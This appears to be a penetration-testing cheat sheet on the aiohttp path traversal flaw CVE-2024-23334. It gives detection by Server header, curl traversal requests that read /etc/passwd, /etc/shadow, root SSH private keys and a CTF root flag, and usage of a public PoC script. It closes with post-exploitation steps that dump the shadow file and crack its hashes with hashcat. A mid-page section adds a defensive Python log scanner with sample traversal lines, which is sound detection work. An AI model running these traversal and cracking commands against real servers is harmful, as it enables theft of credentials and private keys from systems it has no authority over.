# aiohttp

aiohttp is an asynchronous HTTP client/server framework for Python.

## CVE-2024-23334 - Path Traversal / LFI

**Vulnerable versions:** aiohttp < 3.9.2

**Detection:**

Check the `Server` response header for the aiohttp version:

```http
HTTP/1.1 200 OK
Server: Python/3.9 aiohttp/3.9.1
```

### Exploitation

The vulnerability is a path traversal: when static file serving is enabled, a request can read files outside the web root.

**Manual exploitation:**

```bash
# Read /etc/passwd
curl "http://target:8080/assets/../../../etc/passwd"

# Read /etc/shadow (if running as root)
curl "http://target:8080/assets/../../../etc/shadow"

# Read root flag
curl "http://target:8080/assets/../../../root/root.txt"

# Read SSH keys
curl "http://target:8080/assets/../../../root/.ssh/id_rsa"
```

**Using the PoC script:**

```bash
git clone https://github.com/TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC.git
cd LFI-aiohttp-CVE-2024-23334-PoC

# Read specific file
./lfi_aiohttp.sh -f "/etc/passwd"
./lfi_aiohttp.sh -f "/root/root.txt"
./lfi_aiohttp.sh -f "/etc/shadow"
```

### Common Static Paths to Target

```
/assets/
/static/
/files/
/css/
/js/
/images/
```
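From the defender's side, the same prefixes are where to look in access logs. The following is an added example, not part of the original page or the PoC project: it flags requests that start under one of the static prefixes above but resolve outside it once decoded and normalised. The log line format, the sample lines and the function names are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Static prefixes listed on this page.
STATIC_PREFIXES = ("/assets/", "/static/", "/files/", "/css/", "/js/", "/images/")

# Assumed log format: the request line in quotes, followed by the status code.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def escapes_static_root(target: str) -> bool:
    """True if the path starts under a static prefix but resolves outside it."""
    path = urlsplit(target).path
    # Decode twice so %2e%2e and double-encoded %252e%252e are both caught.
    for _ in range(2):
        path = unquote(path)
    path = path.replace("\\", "/")
    for prefix in STATIC_PREFIXES:
        if path.startswith(prefix):
            resolved = posixpath.normpath(path)
            return not (resolved + "/").startswith(prefix)
    return False


def scan(lines):
    """Return (line_no, target, status) for each request escaping a static prefix."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and escapes_static_root(m["target"]):
            hits.append((n, m["target"], int(m["status"])))
    return hits


# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.5 [12/Mar/2024:10:01:02 +0000] "GET /assets/app.css HTTP/1.1" 200 5120',
    '192.0.2.9 [12/Mar/2024:10:01:07 +0000] "GET /assets/../../../etc/passwd HTTP/1.1" 200 1834',
    '192.0.2.9 [12/Mar/2024:10:01:09 +0000] "GET /static/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 404 14',
    '192.0.2.5 [12/Mar/2024:10:01:11 +0000] "GET /assets/css/../app.js HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for line_no, target, status in scan(SAMPLE_LOG):
        print(f"line {line_no}: status={status} target={target}")
```

A hit with status 200 means the server returned content for a path outside the static root and should be triaged first; other statuses still record an attempt.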

### Post-Exploitation

If running as root and `/etc/shadow` is readable:

```bash
# Extract shadow file
./lfi_aiohttp.sh -f "/etc/shadow" > shadow

# Get passwd
./lfi_aiohttp.sh -f "/etc/passwd" > passwd

# Crack hashes
unshadow passwd shadow > unshadow.txt
hashcat -m 1800 unshadow.txt /usr/share/wordlists/rockyou.txt
```

### References

* <https://github.com/TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC>
* <https://nvd.nist.gov/vuln/detail/CVE-2024-23334>


